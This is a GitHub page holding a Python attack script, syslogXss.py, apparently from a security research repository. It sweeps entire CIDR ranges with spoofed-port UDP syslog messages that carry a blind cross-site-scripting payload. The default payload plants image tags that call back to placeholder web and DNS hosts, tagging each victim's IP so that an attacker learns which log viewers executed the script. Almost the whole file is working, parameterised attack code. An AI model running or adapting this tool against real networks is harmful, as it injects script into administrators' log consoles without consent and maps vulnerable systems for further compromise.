scripts/syslogXss.py at master · vulnersCom/scripts · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
__author__ = 'isox'
import netaddr
from multiprocessing import Pool
import socket
import string
import random
import time
from optparse import OptionParser

FACILITY = {
    'kern': 0, 'user': 1, 'mail': 2, 'daemon': 3,
    'auth': 4, 'syslog': 5, 'lpr': 6, 'news': 7,
    'uucp': 8, 'cron': 9, 'authpriv': 10, 'ftp': 11
}

LEVEL = {
    'emerg': 0, 'alert':1, 'crit': 2, 'err': 3,
    'warning': 4, 'notice': 5, 'info': 6, 'debug': 7
}


def asyncSendPayload(sharedSocket, ipaddress, port, payload):
    retryCount = 5
    retryCurrent = 0
    facility = FACILITY.get('kern')
    level = LEVEL.get('emerg')
    data = '<%d>%s' % (level + facility*8, payload)
    finished = False
    while not finished:
        try:
            sharedSocket.sendto(data.encode(), (ipaddress, port))
            finished = True
        except Exception as e:
            time.sleep(1)
        retryCurrent += 1
        if retryCurrent > retryCount:
            print("Fatal error sending to %s" % ipaddress)
            finished = True
    #print("Sent: %s" % (data.encode()))
    return True


class syslogXssManager(object):
    def __init__(self, cidrNetworkList, portList = None, maxProcesses = None, replayCount = None, payload = None):
        self.maxProcesses = maxProcesses or 30
        self.replayCount = replayCount or 1
        self.bindPorts = [int(port) for port in portList] or [53]
        self.cidrNetworkList = cidrNetworkList
        self.payload = payload

    def job(self):
        targetList = self.createTask()
        self.runAttack(targetList)

    def idGenerator(self, size=6, chars=string.ascii_uppercase + string.digits):
        return ''.join(random.choice(chars) for _ in range(size))

    def createTask(self):
        # Here goes example xss/dns payload
        # Listen for the logs of the ns server
        # Prepare www server for callbacks
        dnsServer = 'nsserv.example.com'
        webServer = 'web.example.com'
        examplePayload = "%s'\"><img/src=//%s."+ dnsServer + "><img/src=//" + webServer + "/1.png?%s><"
        payload = self.payload or examplePayload
        print("Using payload: %s" % payload)
        attackNetworkList = [netaddr.IPNetwork(networkCidr) for networkCidr in self.cidrNetworkList]
        network = netaddr.IPSet(attackNetworkList)
        print("Total attack len: %s" % len(network))
        attackTargetList = [{'ipaddress':"%s" % ipAddress, 'port':514, 'payload':self.payload or (payload % (self.idGenerator(), ipAddress, ipAddress))} for ipAddress in network]
        return attackTargetList


    def runAttack(self, targetList):
        # targetList = [{'ipaddress:':'127.0.0.1', 'port':53, 'payload':'blablabla']
        for counter in range(0, self.replayCount):
            for port in self.bindPorts:
                requestPool = Pool(processes=self.maxProcesses)
                sharedSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                sharedSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                sharedSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
                #sharedSocket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 64)
                try:
                    sharedSocket.bind(('', port))
                    print("Sending packets from port %s" % port)
                    taskList = [(sharedSocket, targetParams.get('ipaddress'), targetParams.get('port'), targetParams.get('payload')) for targetParams in targetList]
                    results = requestPool.starmap(asyncSendPayload, taskList)
                except Exception as e:
                    print("Failed binding port %s: %s" % (port, e))
                print("Closing process pool")
                requestPool.close()
                print("Joining process pool")
                requestPool.join()
                print("Closing shared socket")
                sharedSocket.close()
        return True

def main():
    parser = OptionParser(usage="usage: %prog [options] network CIDR",
                          version="%prog 1.0")
    parser.add_option("-f", "--file",
                      default=False,
                      help="Read CIDR network list splitted by newline from file")
    parser.add_option("-t", "--threads",
                      default=30,
                      help="Threads concurency, default 30")
    parser.add_option("-r", "--replay",
                      default=False,
                      help="Perform replay of the attack, default 1")
    parser.add_option("-p", "--port",
                      default=53,
                      help="Bind port to send packets from. Default 53. May be set as '53,54,55'")
    parser.add_option("-m", "--message",
                      default=None,
                      help="Set customized payload string")
    (options, args) = parser.parse_args()

    if not options.file and len(args) != 1:
        parser.error("Wrong number of arguments")
    cidrNetworkList = set()
    if options.file:
        with open(options.file, 'r') as fileDescriptior:
            dataFromFile = fileDescriptior.read().strip(


            )
            cidrNetworkList = cidrNetworkList.union(set(dataFromFile.splitlines()))
    cidrNetworkList = cidrNetworkList.union(set(args))
    syslogAttacker = syslogXssManager(cidrNetworkList, portList=("%s" % options.port).split(","),maxProcesses=int(options.threads), replayCount=int(options.replay), payload=options.message)
    syslogAttacker.job()

if __name__ == '__main__':
    main()